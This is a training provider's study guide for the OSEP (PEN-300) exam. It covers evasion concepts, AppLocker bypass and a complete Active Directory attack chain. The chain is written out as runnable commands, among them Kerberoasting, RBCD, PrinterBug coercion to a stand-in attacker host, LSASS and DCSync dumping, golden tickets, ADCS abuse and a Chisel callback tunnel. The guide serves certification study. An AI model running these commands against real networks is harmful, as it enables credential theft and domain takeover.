Skip to content
Get 10% Discount on Every Courses
Login/Register
Call: +91-9930824239
Email: services@macksofy.com
Macksofy TrainingsMacksofy Trainings
  • About Us
    • About Macksofy Trainings — EC-Council Accredited Cybersecurity Training Center
    • Our Esteem Clients
  • Courses

      Beginner

      • SEC-100 CyberCore Security Essentials
      • Certified Ethical Hacker CEHV13 with Artificial Intelligence
      • Certified Ethical Hacker with Artificial Intelligence CEHV13 Practical
      • Certified Ethical Hacker CEHv12
      • The Certified SOC Analyst CSA
      • Certified Threat Intelligence Analyst (CTIA)
      • Computer Hacking Forensic Investigator (CHFI)
      • Foundational Wireless Network PEN 210 Course

      Intermediate

      • SEC-100 CyberCore Security Essentials
      • SOC-200: Foundational Security Operations and Defensive Analysis
      • Foundational Wireless Network PEN 210
      • Certified Threat Intelligence Analyst (CTIA)
      • The Certified SOC Analyst CSA
      • Advanced Windows Exploitation EXP-401
      • Advanced macOS Control Bypasses EXP-312

      Professional

      • Certified Penetration Testing Professional CPENT
      • Advanced macOS Control Bypasses OSMR | EXP 312
      • Windows User Mode Exploit Development OSED | EXP 301
      • OSWE | WEB 300 Advanced Web Attacks and Exploitation
      • OSWA | WEB 200 Foundational Web Application Assessments with Kali Linux
      • OSEP | PEN-300 Advanced Evasion Techniques and Breaching Defenses
      • OSCP | PEN 200 Penetration Testing with Kali Linux
  • Certifications
    • Offsec Certification Voucher
    • EC Council Certification Voucher
  • Our Training
    • OSCP+ Training and Certification
    • Sec 100 Cybercore Security Essentials
    • Certified Ethical Hacker (CEH) V13
    • Certified Ethical Hacker Training
    • Certified Threat Intelligence Analyst (CTIA)
    • OSWE (WEB-300) Training And Certification Offsec India
    • The Certified Penetration Testing Professional (CPENT)
    • Computer Hacking Forensic Investigator CHFI
  • Blog
  • Contact Us
Enroll Now
Macksofy TrainingsMacksofy Trainings
  • About Us
    • About Macksofy Trainings — EC-Council Accredited Cybersecurity Training Center
    • Our Esteem Clients
  • Courses

      Beginner

      • SEC-100 CyberCore Security Essentials
      • Certified Ethical Hacker CEHV13 with Artificial Intelligence
      • Certified Ethical Hacker with Artificial Intelligence CEHV13 Practical
      • Certified Ethical Hacker CEHv12
      • The Certified SOC Analyst CSA
      • Certified Threat Intelligence Analyst (CTIA)
      • Computer Hacking Forensic Investigator (CHFI)
      • Foundational Wireless Network PEN 210 Course

      Intermediate

      • SEC-100 CyberCore Security Essentials
      • SOC-200: Foundational Security Operations and Defensive Analysis
      • Foundational Wireless Network PEN 210
      • Certified Threat Intelligence Analyst (CTIA)
      • The Certified SOC Analyst CSA
      • Advanced Windows Exploitation EXP-401
      • Advanced macOS Control Bypasses EXP-312

      Professional

      • Certified Penetration Testing Professional CPENT
      • Advanced macOS Control Bypasses OSMR | EXP 312
      • Windows User Mode Exploit Development OSED | EXP 301
      • OSWE | WEB 300 Advanced Web Attacks and Exploitation
      • OSWA | WEB 200 Foundational Web Application Assessments with Kali Linux
      • OSEP | PEN-300 Advanced Evasion Techniques and Breaching Defenses
      • OSCP | PEN 200 Penetration Testing with Kali Linux
  • Certifications
    • Offsec Certification Voucher
    • EC Council Certification Voucher
  • Our Training
    • OSCP+ Training and Certification
    • Sec 100 Cybercore Security Essentials
    • Certified Ethical Hacker (CEH) V13
    • Certified Ethical Hacker Training
    • Certified Threat Intelligence Analyst (CTIA)
    • OSWE (WEB-300) Training And Certification Offsec India
    • The Certified Penetration Testing Professional (CPENT)
    • Computer Hacking Forensic Investigator CHFI
  • Blog
  • Contact Us

OSEP (PEN-300) Evasion & Breaching Defenses Guide (2026)

  • Home
  • Certification Guides
  • OSEP (PEN-300) Evasion & Breaching Defenses Guide (2026)
Breadcrumb Abstract Shape
Breadcrumb Abstract Shape
Breadcrumb Abstract Shape
Certification Guides

OSEP (PEN-300) Evasion & Breaching Defenses Guide (2026)

  • August 12, 2026
  • 0
OSEP PEN-300 evasion and breaching defenses study guide 2026 — AV/EDR evasion, AppLocker bypass and the Active Directory kill chain — Macksofy Trainings

OSEP and PEN-300, on one screen

Quick answer: OSEP (OffSec Experienced Penetration Tester) is OffSec’s advanced certification, earned through the PEN-300 “Evasion Techniques and Breaching Defenses” course. Where OSCP asks “can you find and exploit a vulnerability,” OSEP asks a harder one: can you do it when antivirus, EDR, application whitelisting and network segmentation are all fighting you? The exam runs 47 hours 45 minutes of hands-on hacking plus 24 hours to write the report. You pass by reaching the control-panel objective (proven with secret.txt) or by collecting at least 100 points of 10-point flags. This guide walks the full skill set in the order you use it — evasion first, then initial access, then the Active Directory chain — with the commands that matter and the mistakes that quietly cost the pass.

QuestionShort answer
What is it?OffSec’s advanced pentest cert, earned via PEN-300
Prerequisite?OSCP-level skill (assumed, not strictly required)
Exam length47h 45m hands-on + 24h reporting
How you passsecret.txt objective or ≥100 points
Signature skillAV/EDR & AMSI evasion, AppLocker bypass, process injection
Then whatClient-side access → AD chain → forest compromise
Best forAspiring red teamers and senior pentesters

Most people meet OSEP right after passing OSCP, feeling good about themselves — and then they fire their trusty payload at the first PEN-300 lab box and Windows Defender eats it before the shell even lands. That moment is the entire point of the course. OSEP is not about learning ten new exploits. It is about operating inside a network that was built to stop you, where every tool you love is signatured and every hop is watched. This is the map we wish every student had on day one.

We teach this as our OSEP (PEN-300) training in India, so the structure below is the same order we walk our cohorts through: get your code past the defenders, get a foothold through a human, and only then start the Active Directory work that turns one laptop into a whole forest. For the deep mechanics of that last part, our Active Directory pentest guide goes further on the kill chain than we can here — this article keeps its focus on the evasion craft that makes OSEP OSEP.

What OSEP actually tests (and what it doesn’t)

Be honest about the shape of the exam before you spend three months and real money on it. OSEP is breadth under pressure. You are not asked to write a kernel exploit. You are asked to chain a dozen known techniques smoothly, quietly, and without Metasploit’s autopwn doing the thinking for you. In plain English the syllabus covers six families of skill:

  • Defense evasion — running code past antivirus, EDR, AMSI and Constrained Language Mode. The signature skill, and the reason the course exists.
  • Application whitelisting bypass — working with AppLocker and WDAC switched on.
  • Client-side attacks — phishing a human into running your payload, because that is still how real intrusions start.
  • Active Directory attacks — Kerberos abuse, ACLs, delegation, ADCS and trusts.
  • Lateral movement and pivoting — crossing segmented networks without tripping alarms.
  • Post-exploitation and persistence — credential theft, ticket abuse and holding access.

What it does not test: web-app depth (that is OSWE’s job), binary exploitation (OSED), or cloud. Keep the scope in mind — people burn weeks studying the wrong things because they treat OSEP as “OSCP but more.” It is a different animal. If you are still choosing between them, our OSEP vs OSCP comparison lays out the trade-off.

The OSEP exam, honestly

Here is the exam as it stands in 2026. You get a private VPN into a simulated corporate network and 47 hours and 45 minutes to work it. When the hacking clock stops you have another 24 hours to submit the report. There are two ways to pass, and this is the most important strategic fact about the whole thing:

  1. Reach the objective on your control panel — the full compromise path — and prove it with secret.txt. Do that and you pass outright, whatever your points.
  2. Or collect 100 points from flags. Machines drop 10-point local.txt and proof.txt files; enough of them pass you even if you never reach the final objective.

That two-track design should shape your 48 hours. Chase the objective — it is the cleaner pass and usually the intended route — but if you stall, pivot to farming points instead of staring at one locked door. Plenty of people pass on points alone. The ones who fail often bet everything on the objective, got stuck at 80%, and never grabbed the flags sitting right next to them.

On tooling, OSEP is far more relaxed than OSCP: there is no “one automated exploit” handcuff, so Metasploit, CrackMapExec and the rest are fair game. The rule that matters is proof — read every flag with type or cat from its original path in an interactive shell, and screenshot it. A flag without that evidence does not count, and a beautiful compromise you cannot reproduce in the report is a fail. Reporting is not an afterthought on this exam; it is 24 hours of the grade.

The evasion mindset: why defense-in-depth changes everything

On OSCP you throw a payload and it runs. On OSEP, three things happen before your code executes, and you must defeat each:

  1. Antivirus / EDR inspects your file and your behaviour and decides whether to kill you.
  2. AMSI (the Antimalware Scan Interface) intercepts scripts and in-memory code — PowerShell, VBA, JScript — and hands the raw, deobfuscated contents to the AV.
  3. Constrained Language Mode and AppLocker may stop your script or binary from running at all, obfuscated or not.

The shift OSEP forces is this: stop thinking about files and start thinking about the moment of execution. A payload on disk is a signature waiting to be matched. Code that only ever exists in the memory of a process the defender already trusts is far harder to catch. Nearly every technique in the course is a variation on that one idea — move the malicious logic later, into memory, into a trusted host process, away from anything a scanner can fingerprint at rest.

Antivirus and AMSI evasion

This is where PEN-300 earns its reputation. The course takes you from “why did Defender flag my Meterpreter” to writing loaders that never match a signature. We keep the specifics at the mechanism level here — a public blog is not the place for a copy-paste bypass — but the concepts are exactly what you will practise.

Enumerate the defender first

Blindly obfuscating against an AV you have not identified wastes hours. Find out what you are fighting:

# What AV/EDR products are present?
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName
Get-MpComputerStatus                  # Defender real-time status
Get-MpPreference | select Disable*     # which protections are on

# Loaded EDR drivers / agents, from your current host process
tasklist /m | findstr /i "csfalcon cyoptics sysmon SentinelAgent MsMpEng"

An EDR agent or Sysmon changes the game — they watch behaviour, not just files, so a perfectly clean-looking binary still gets you caught the moment it spawns cmd.exe from Word. Knowing the product tells you whether you are fighting a signature engine, a behavioural one, or both.

Signature evasion: make the file boring

The first layer is classic signature matching. The techniques you combine:

  • Encrypting shellcode so the payload bytes are meaningless at rest and only decrypt in memory at runtime.
  • Compiling your own loader in C# or C++ instead of reusing a public tool whose bytes are in every AV database.
  • Source-level obfuscation — renaming, string splitting and control-flow changes that break static signatures without changing behaviour.

The lesson the course drills is that public tools are burned by definition. A stock framework payload is the most-signatured code on earth. The skill is producing a functionally identical loader no scanner has seen — which is why OSEP quietly makes you a better programmer than you expected to become.

AMSI: the scanner that reads your deobfuscated code

AMSI is the clever part of the Windows defensive stack, and the part that catches people who thought obfuscation alone would save them. When your PowerShell finally decodes itself in memory to run, AMSI grabs that decoded buffer and shows it to the AV — your base64 wrapper bought nothing. What matters:

  • Patching AMSI inside your own process’s memory so its scan function returns clean before you run anything — you are modifying your own process, which you are entitled to do.
  • Avoiding AMSI-scanned runtimes by delivering payloads as compiled code rather than script, so there is no script buffer to scan.
  • Reflection and late binding to keep sensitive strings and calls out of anything a pattern-matcher can see.

The honest truth for 2026: the one-liner AMSI bypass strings that circulate online are all signatured — paste one from a 2021 blog and it is flagged on sight. OSEP teaches the mechanism so you can produce a fresh variation, not a magic string to memorise. That is the difference between passing and being permanently one Defender update behind.

Living with application whitelisting (AppLocker / WDAC)

Application whitelisting flips the model: instead of blocking known-bad, it allows only known-good. If your evil.exe is not on the allow list, it simply will not run — no scan required. This kills a lot of lazy tradecraft, and OSEP wants you comfortable around it. The reliable approach: enumerate the policy, then abuse a trusted location or a trusted binary.

# Read the effective AppLocker policy
Get-AppLockerPolicy -Effective -Xml
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

# Default rules allow all of C:\Windows - find writable sub-dirs inside it
icacls "C:\Windows\Tasks"
icacls "C:\Windows\Temp"
icacls "C:\Windows\System32\spool\drivers\color"

Two ideas do most of the work. First, the default rules are permissive — out of the box AppLocker allows anything under C:\Windows and C:\Program Files, and both hold sub-directories a normal user can write to. Drop your payload there and it is “allowed.” Second, LOLBins — Microsoft-signed executables already on the allow list that can be coerced into running your code, such as InstallUtil, regsvr32, MSBuild and rundll32. The whitelist trusts them, so it trusts what they load.

Constrained Language Mode usually rides along with AppLocker, hobbling PowerShell so most offensive modules will not load. The counter is to stop using PowerShell as your execution engine and run your logic as compiled .NET through a trusted LOLBin instead — the language mode never gets a script to veto.

Process injection: hiding in a process the defender trusts

Once your code can start, put it where the defender does not expect trouble: inside a legitimate process. Process injection is core OSEP muscle memory. The family, roughly from loudest to quietest:

TechniqueIdeaWhy it matters
Self-injectionRun shellcode in your own loader’s memorySimple; avoids a second process but your loader is the target
Remote injectionAllocate + write + create a thread in another processThe classic; hides you inside explorer.exe or a browser
Process hollowingStart a legit process suspended, swap its image, resumeThe running process looks legitimate on paper
Reflective / in-memory loadingLoad a DLL from memory, never touching diskNo file for a scanner to find
APC / callback injectionQueue your code onto a thread the OS will runQuieter than a raw remote thread; fewer telltale API calls

You do not need to memorise every Windows API by heart, but you should understand the shape of the classic chain — open a handle to the target, allocate executable memory in it, write your (decrypted) shellcode, and get it running — because that pattern is what EDR hooks are watching for. The evasion work is choosing variants of those steps that the specific EDR in front of you does not flag, which is exactly the enumerate-then-adapt loop the whole course trains.

Client-side attacks: getting a human to run your payload

Real intrusions rarely start with a network exploit any more — they start with a person clicking something. OSEP takes this seriously and so should you. The delivery mechanisms you will build and be tested on:

  • Macro-enabled Office documents — a VBA macro that stages and runs your loader when the victim enables content.
  • HTA and JScript / VBScript — HTML applications that run with full trust outside the browser sandbox.
  • LNK and ISO/container delivery — shortcuts and mounted images that dodge Mark-of-the-Web and slip past email filters.
  • Signed-binary proxy execution — using a trusted Windows binary to launch your code so the initial process tree looks innocent.

The craft here is not the macro itself — it is making the whole chain survive contact with a mail gateway, a sandbox detonation, and a suspicious user. That means your document should look plausible, your payload should behave normally when detonated in an automated sandbox (many wait or check for a real user), and your callback should blend into normal traffic. This is where evasion and social engineering meet, and it is a genuinely creative part of the exam.

From one workstation to the whole domain

Get past the defenders, land through a phish, and you are on a single domain-joined machine as a low-privileged user. Now the OSEP labs open up into their real substance: Active Directory. This is the same tradecraft real red teams use, and it is deep enough that we give it a dedicated walkthrough in our Active Directory pentest guide. Below is the working sequence with the commands you will reach for most, kept tight so you can see the whole chain at once.

Map the domain before you touch anything

Enumeration is not optional and it is not glamorous, but the candidates who pass are the ones who build a mental map of the domain before swinging. PowerView and BloodHound are the two tools you must know cold:

# PowerView - quick wins
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | select samaccountname          # kerberoastable
Get-DomainUser -PreauthNotRequired                    # AS-REP roastable
Get-DomainComputer -Unconstrained | select name       # delegation targets
Find-InterestingDomainAcl -ResolveGUIDs               # abusable ACLs

# BloodHound - collect, then hunt shortest paths in the GUI
.\SharpHound.exe -c All --zipfilename loot
# (or) bloodhound-python -d corp.local -u user -p pass -c All -ns 10.10.10.10

BloodHound is the single highest-leverage tool in the AD phase. Import the data, mark your owned principals, and ask it for the shortest path to Domain Admins. It turns a wall of objects into a literal attack route — and on OSEP, most of the escalation puzzles are BloodHound edges dressed up as a scenario.

Spraying and roasting for that first credential

Two techniques get most people their first real foothold in the domain. Password spraying tries one sensible password against every user — slowly, to respect lockout policy — and Kerberoasting cracks the passwords of service accounts offline.

# Password spray (respect the lockout threshold!)
crackmapexec smb 10.10.10.0/24 -u users.txt -p 'Autumn2026!' --continue-on-success
kerbrute passwordspray -d corp.local users.txt 'Autumn2026!'

# Kerberoast - request service tickets, crack offline
GetUserSPNs.py corp.local/user:pass -dc-ip 10.10.10.10 -request -outputfile roast.txt
Rubeus.exe kerberoast /outfile:roast.txt
hashcat -m 13100 roast.txt rockyou.txt --force

# AS-REP roast - for accounts with pre-auth disabled
GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -outputfile asrep.txt
hashcat -m 18200 asrep.txt rockyou.txt --force

A note that saves exams: watch the lockout policy before you spray. Locking out fifty accounts on a proctored exam is a bad afternoon. Pull the policy with Get-DomainPolicy or crackmapexec smb DC --pass-pol and stay one attempt under the threshold with a comfortable window between rounds.

ACL abuse and Kerberos delegation — the escalation workhorses

Two categories of misconfiguration do most of the privilege-escalation work in OSEP. Abusable ACLs are permissions that let a user you control rewrite the rights of a user you want — GenericAll, WriteDACL, WriteOwner, GenericWrite. Kerberos delegation lets a service act on behalf of other users, and when it is configured loosely you can turn that into impersonation of a Domain Admin.

# ACL abuse - grant yourself power over a target principal, then act
Add-DomainObjectAcl -TargetIdentity 'target_user' -PrincipalIdentity 'me' -Rights All
Set-DomainUserPassword -Identity target_user -AccountPassword $sec   # if GenericAll

# Constrained delegation - S4U to impersonate an admin to a service
Rubeus.exe s4u /user:svc$ /rc4:HASH /impersonateuser:administrator \
  /msdsspn:cifs/target.corp.local /altservice:host,http /ptt

# Resource-Based Constrained Delegation (RBCD) - the modern favourite
addcomputer.py -computer-name 'EVIL$' -computer-pass 'Passw0rd!' corp.local/user:pass
rbcd.py -delegate-to 'TARGET$' -from 'EVIL$' -action write corp.local/user:pass
Rubeus.exe s4u /user:EVIL$ /rc4:HASH /impersonateuser:administrator \
  /msdsspn:cifs/target.corp.local /ptt

RBCD is worth singling out because it is everywhere in modern AD and it only needs one thing: write access to a computer object’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute. Combine it with the fact that a standard user can often add machine accounts, and a single over-permissive ACL becomes a full impersonation primitive. BloodHound flags these paths directly — another reason to lead with it.

Unconstrained delegation and coercion

Unconstrained delegation is the loudest and most powerful of the three. A host set for it caches the Kerberos TGT of anyone who authenticates to it — so if you own such a host and can force a Domain Controller to authenticate to you, you capture the DC’s ticket and it is game over.

# On the unconstrained host: watch for incoming TGTs
Rubeus.exe monitor /interval:5 /nowrap

# Coerce the DC to authenticate to you (the PrinterBug)
printerbug.py corp.local/user:pass@dc.corp.local ATTACKER_HOST
# then extract + pass the captured DC ticket
Rubeus.exe ptt /ticket:BASE64_TGT

Credential access and ticket forging

Once you have admin on a box, you harvest. Once you have the domain’s krbtgt hash, you own it indefinitely. The command families:

# Dump LSASS and parse offline (keep the parse OFF the target)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
pypykatz lsa minidump lsass.dmp

# DCSync - pull hashes straight from the DC via replication
secretsdump.py corp.local/administrator@dc.corp.local -just-dc
mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

# Golden ticket - forge a TGT once you hold krbtgt
mimikatz # kerberos::golden /user:Administrator /domain:corp.local \
  /sid:S-1-5-21-... /krbtgt:HASH /ptt

Golden, silver and diamond tickets, pass-the-hash, overpass-the-hash and pass-the-ticket are all variations on one theme: once you hold the right secret, you can mint or reuse Kerberos authentication material without ever knowing a plaintext password. OSEP wants you fluent in which secret buys which capability, not just able to run one mimikatz command.

ADCS: certificates as a skeleton key

Active Directory Certificate Services has become one of the most reliable escalation routes in AD, and OSEP includes it. A misconfigured certificate template (the ESC1–ESC8 family) lets a low-privileged user request a certificate as a Domain Admin, then authenticate with it. Certipy makes the whole thing almost mechanical:

# Find vulnerable templates
certipy find -u user@corp.local -p pass -dc-ip 10.10.10.10 -vulnerable -stdout

# ESC1 - request a cert as the administrator via an SAN
certipy req -u user@corp.local -p pass -ca CORP-CA -template VulnTemplate \
  -upn administrator@corp.local

# Authenticate with the cert to recover a hash / TGT
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

Because a certificate stays valid even after a password change, ADCS abuse doubles as stealthy persistence — a point worth making in your report’s remediation section, which OffSec grades.

Lateral movement without waking the defenders

With credentials or a hash in hand you spread. The methods are well known; the OSEP twist is doing them while an EDR watches. Prefer the quieter options and know why each is noisy or not:

# Pass-the-hash across the estate
crackmapexec smb 10.10.10.0/24 -u administrator -H NTHASH -x whoami
psexec.py -hashes :NTHASH corp.local/administrator@target   # loud: creates a service
wmiexec.py -hashes :NTHASH corp.local/administrator@target   # quieter: WMI, no service
evil-winrm -i target -u administrator -H NTHASH              # clean if WinRM is open

psexec is reliable but loud — it drops a service and writes to disk, exactly the behaviour a modern EDR alerts on. wmiexec and WinRM are lighter-touch. On a monitored network the winning instinct is to ask “what is the quietest tool that still works here,” not “what is my favourite,” and that instinct is precisely what OSEP is grading.

Pivoting through segmented networks

OSEP networks are segmented on purpose. The machine you own can reach subnets your attack box cannot, so you tunnel your tools through it. The two workhorses are Chisel for a reverse SOCKS proxy and SSH dynamic forwarding when you have Linux in the path:

# Chisel reverse SOCKS: server on your attack box, client on the victim
./chisel server -p 8080 --reverse                    # attacker
./chisel client ATTACKER_IP:8080 R:socks              # victim (calls back)

# Point your tools at it via proxychains (socks5 127.0.0.1 1080)
proxychains crackmapexec smb 10.10.20.0/24 -u user -H NTHASH

# SSH dynamic forward as an alternative pivot
ssh -D 1080 user@linux_pivot -N

Double-pivots — tunnelling through one host to reach a second that tunnels to a third — show up on OSEP and trip people up. Keep a clear diagram of your tunnels and their local ports; the single most common self-inflicted wound in this phase is losing track of which proxychains port reaches which subnet.

MSSQL and linked servers

SQL Server is a recurring OSEP theme because it bridges the network and the OS. A service account you can reach often has xp_cmdshell within reach, and linked servers let you hop from one SQL instance to another — sometimes across a trust boundary — using the link’s stored credentials:

# Connect (Windows auth) and enable command execution
mssqlclient.py corp.local/user:pass@sql01.corp.local -windows-auth
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami

# Enumerate and traverse linked servers
SQL> enum_links
SQL> SELECT * FROM OPENQUERY("SQL02", 'SELECT @@version')
SQL> EXEC ('sp_configure ''xp_cmdshell'',1; RECONFIGURE') AT [SQL02]

Chaining OPENQUERY calls across a line of linked servers to run a command on the box at the far end is a classic OSEP puzzle. It feels like magic the first time and mechanical by the fifth — which is exactly the fluency the exam rewards.

What a full OSEP-style compromise looks like end to end

Techniques in isolation are trivia. The exam tests whether you can chain them. Here is a representative route from zero to secret.txt, the kind of story your report should tell:

  1. Delivery. A macro document slips past the mail filter; the victim enables content and your loader — encrypted, AMSI handled — runs in memory. You have a beacon as a low-privileged user.
  2. Local situational awareness. You enumerate the AV/EDR, confirm AppLocker is on, and stage your tooling into a writable, allow-listed directory.
  3. Domain recon. SharpHound runs; BloodHound shows a service account with a kerberoastable SPN one ACL-hop from a server admin group.
  4. Credential. You kerberoast the service account and crack it offline. It has WriteDACL on a privileged group.
  5. Escalation. You abuse that ACL to add yourself, land admin on a server, and dump LSASS — recovering a Domain Admin’s hash cached from an earlier logon.
  6. Domain compromise. With DA you DCSync the krbtgt hash and forge a golden ticket for durable access.
  7. Objective. A final segmented subnet holds the goal system; you pivot to it with Chisel, use the golden ticket to walk in, and read secret.txt. Screenshots at every step.

Notice how little of that is exploitation in the OSCP sense. It is evasion, enumeration, and the patient chaining of misconfigurations — the exact profile of a real red-team engagement, which is why OSEP carries the weight it does with Indian employers hiring for red team certifications.

How to actually prepare for OSEP

Assuming you are already at OSCP level, a realistic plan is 12 to 16 weeks of consistent effort. What works, from watching many students through it:

  1. Weeks 1–3: get comfortable with C# and PowerShell. If you cannot read and modify a simple loader, start here. The programming is the wall most people hit, and it is surmountable with a few weeks of deliberate practice.
  2. Weeks 4–7: work the course material and every exercise. PEN-300 gives you extra-mile challenges — do them. They are the closest thing to the exam’s difficulty.
  3. Weeks 8–12: grind the Challenge Labs. The six challenge labs are the real preparation. Treat each like a mini-exam: no notes-diving, timed, report as you go.
  4. Weeks 13–16: build your notes and your muscle memory. A clean, searchable command reference you trust is worth a point or two of buffer on exam day.

Two habits matter more than any single technique. First, build your notes as you learn, not the night before — a personal cheat sheet you wrote yourself is recalled far faster than someone else’s. Second, write the report as you go during the exam; nobody does their best documentation at hour 47 on no sleep.

Why capable people still fail OSEP

  • Weak programming. Treating the loaders as copy-paste rather than understanding them — then being unable to adapt when the stock version gets flagged.
  • Objective tunnel-vision. Betting the whole exam on the objective and ignoring the 100-point path when they stall.
  • Poor enumeration. Swinging before mapping the domain, and missing the one ACL edge that was the intended route.
  • Losing the pivots. Tangled tunnels and forgotten proxychains ports eating hours in the segmented phase.
  • Reporting left to the end. Running out of the 24-hour window, or missing the proof screenshot that makes a flag count.

The OSEP toolkit worth knowing cold

JobToolsNotes
AD reconPowerView, SharpHound / BloodHoundBloodHound is the highest-leverage tool in the whole exam
KerberosRubeus, Impacket (GetUserSPNs, GetNPUsers)Roasting, S4U, ticket abuse
Credential dumpMimikatz, pypykatz, secretsdump.pyKeep parsing off the target where you can
Lateral movementCrackMapExec, Impacket exec suite, evil-winrmPick the quietest tool that works
ADCSCertipyESC1–ESC8 discovery and abuse
PivotingChisel, proxychains, SSH -DDraw your tunnel map
MSSQLmssqlclient.pyxp_cmdshell + linked-server hops
Delivery / evasionCustom C#/C++ loadersRoll your own; public tools are pre-burned

Frequently asked questions about OSEP

What is the OSEP certification and what does PEN-300 teach?

OSEP (OffSec Experienced Penetration Tester) is OffSec’s advanced penetration-testing certification, earned by completing the PEN-300 course, “Evasion Techniques and Breaching Defenses.” It focuses on getting code past antivirus, EDR and AMSI, bypassing application whitelisting, client-side attacks, and a full Active Directory attack chain — the skills of a modern red teamer rather than a vulnerability scanner.

How hard is OSEP compared to OSCP?

Most people find OSEP harder in a different way. OSCP tests whether you can find and exploit vulnerabilities; OSEP assumes you can already do that and tests whether you can operate against active defences and write your own tooling. The programming requirement is the biggest step up. See our full OSEP vs OSCP comparison for a side-by-side breakdown.

How long is the OSEP exam and how do you pass it?

The exam gives you 47 hours and 45 minutes of hands-on hacking, plus a further 24 hours to submit your report. You pass either by reaching the objective shown on your control panel (proven by capturing secret.txt) or by collecting at least 100 points from 10-point flags scattered across the network.

Do you need OSCP before taking OSEP?

OSCP is not a hard prerequisite, but OSEP assumes OSCP-level skill — comfort with enumeration, exploitation and a working shell. If you are not yet at that level, start with OSCP (PEN-200) first; jumping straight to OSEP without that base is the most common reason people struggle.

Is OSEP worth it for a red team career in India?

Yes, for the right person. OSEP maps directly to red-team and advanced-pentest roles, and Indian employers hiring for red teams recognise it as evidence of real evasion and AD tradecraft. It is less useful if your target role is web-app focused (look at OSWE) or defensive (look at SOC-200 / OSDA).

How much does OSEP cost in India?

OSEP is priced by OffSec in US dollars as part of a PEN-300 course-and-exam bundle, so the rupee cost varies with the exchange rate and the package you pick. For current India pricing, EMI options and mentor-led preparation, see our OSEP training page or talk to our team directly.

What tools should I master for OSEP?

BloodHound and PowerView for AD recon; Rubeus and Impacket for Kerberos; Mimikatz and pypykatz for credentials; CrackMapExec and evil-winrm for lateral movement; Certipy for ADCS; Chisel and proxychains for pivoting; and, above all, the ability to write your own C# or C++ loaders, because public tools are already signatured.

Can you use Metasploit in the OSEP exam?

Yes. Unlike OSCP, OSEP does not restrict automated tools, so Metasploit, CrackMapExec and similar are allowed. The catch is that the network is defended — a stock Meterpreter payload will usually be caught, which is exactly why the course teaches you to build evasive delivery instead of relying on defaults.

Where to train for OSEP in India

OSEP is a self-study certification at heart, but the evasion and programming curve is exactly where a mentor saves you weeks. Our OSEP (PEN-300) training is a mentor-led, exam-focused bootcamp: you build real loaders, work full AD chains in a lab, and get your report reviewed the way OffSec graders read them. If you are planning your path, pair it with our OSEP vs OSCP comparison and the wider red team certifications guide to make sure OSEP is the right next step rather than OSCP (PEN-200) or OSWE first.

Have a question about your specific background or timeline? Reach out to our team — we would rather tell you honestly whether you are ready than sell you a seat you are not set up to pass.

This guide is educational material for authorised, legal penetration testing and certification preparation only. Every technique described is for use in environments you own or are explicitly contracted to test. Exam details (duration, points, objective) reflect OffSec’s published structure at the time of writing — always confirm current details against OffSec’s official exam guide before booking. Macksofy Trainings is an EC-Council Accredited Training Center; our Offensive Security programmes (including OSCP, OSEP, OSWA, OSWE and SOC-200) are independent exam-preparation bootcamps and are not affiliated with, endorsed by, or certified by OffSec. OSEP, PEN-300, OSCP and all product and certification names are the property of their respective owners.

Share on:
Macksofy Editorial Team

The Macksofy Editorial Team is a collective of cybersecurity practitioners, trainers, and course designers at Macksofy Trainings — India's EC-Council Accredited Training Center for OSCP, OSWE, OSEP, CEH v13 AI, SOC-200 (OSDA), CPENT, and other offensive + defensive security certifications. Our instructors hold the certifications they teach and bring active commercial penetration testing, SOC operations, and red team engagement experience into classroom, online, and hybrid programs delivered from Mumbai, Hyderabad, Dubai, and Toronto.


Editorial focus areas: EC-Council Accredited Training Center operations, OffSec OSCP/OSWE/OSEP/OSED/SOC-200 program delivery, EC-Council CEH v13 AI / CHFI / CCISO / CTIA / ECIH curriculum, CompTIA Security+/Network+/CySA+ pathways, and India-specific cybersecurity career roadmaps for SOC, pentest, red team, and AppSec roles.

API Security Testing in 2026: The Complete Guide to the OWASP API Top 10, Tools and Careers
macksofy_white (1)

Welcome To Macksofy Technologies Cyber Security Training Certification Courses Macksofy Ethical Hacking Training Institute develops and delivers proprietary vendor neutral professional certifications like for the cyber security industry.

Popular Courses

  • SEC 100 Course
  • Certified Ethical Hacker (CEH) Version 13
  • PEN 200 Course
  • Penetration Testing Professional CPENT
  • Training Locations

Useful Links

  • Privacy Policy
  • Terms & Condition
  • Refund and Returns Policy

Get Contact

  • Phone: +91-9930824239
  • E-mail: services@macksofy.com
  • Location: Mumbai | Hyderabad | Dubai | Oman | Canada [elfsight_whatsapp_chat id=”1″]
Icon-facebook Icon-linkedin2 Icon-instagram Icon-twitter

Disclaimer: Some graphics used on this website are sourced from public domains and are freely available for use.
This site may also contain copyrighted material whose use has not always been specifically authorized by the copyright owner.
All product names, trademarks, and brands mentioned are the property of their respective owners. Certification titles referenced are trademarks of the issuing organizations.

References to companies, products, and services on this website are for identification purposes only. We do not own, claim copyright over, or have explicit permission to use these names, logos, or trademarks, and their inclusion does not imply endorsement.

For further information or concerns, please contact us directly.

©2024. All rights reserved by Macksofy Technology.
[elfsight_whatsapp_chat id="1"]
Macksofy TrainingsMacksofy Trainings

Sign in

Lost your password?

Sign up

Already have an account? Sign in